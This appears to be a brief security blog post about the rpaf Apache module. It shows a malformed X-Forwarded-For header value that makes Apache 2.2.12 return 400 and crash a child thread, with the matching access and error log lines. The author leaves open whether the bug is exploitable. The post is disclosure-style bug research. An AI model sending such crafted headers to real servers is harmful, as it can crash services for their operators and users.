d2's lair

rpaf is for backend Apache servers what mod_proxy_add_forward is for frontend Apache servers. It does excactly the opposite of mod_proxy_add_forward written by Ask Bjørn Hansen. It will also work with mod_proxy in Apache starting with release 1.3.25 and mod_proxy that is distributed with Apache2 from version 2.0.36.

It changes the remote address of the client visible to other Apache modules when two conditions are satisfied. First condition is that the remote client is actually a proxy that is defined in httpd.conf. Secondly if there is an incoming X-Forwarded-For header and the proxy is in it’s list of known proxies it takes the last IP from the incoming X-Forwarded-For header and changes the remote address of the client in the request structure. It also takes the incoming X-Host header and updates the virtualhost settings accordingly. For Apache2 mod_proxy it takes the X-Forwared-Host header and updates the virtualhosts

Latest version is 0.6

Pretty useful stuff if you use load balancers/proxies etc etc and you want to keep your Apache’s log format untouched. Right. Now what will happen if I choose to append/change/add x-forwarded-for header with some ‘malicious’ input like the one below?

x-forwarded-for: \’\”);|]*{
<

Apache 2.2.12 will report 400 bad request and then segfault one thread :)

# cat /var/log/apache2/access.log
IP.IP.IP.IP – - [14/Jun/2010:10:24:53 +0200] “GET / HTTP/1.1″ 400 573 “referer: -” “-”

# cat /var/log/apache2/error.log
[Mon Jun 14 10:27:22 2010] [error] [client IP.IP.IP.IP] request failed: error reading the headers
[Mon Jun 14 10:27:31 2010] [notice] child pid 1877 exit signal Segmentation fault (11)

Is it exploitable? I don’t know for now.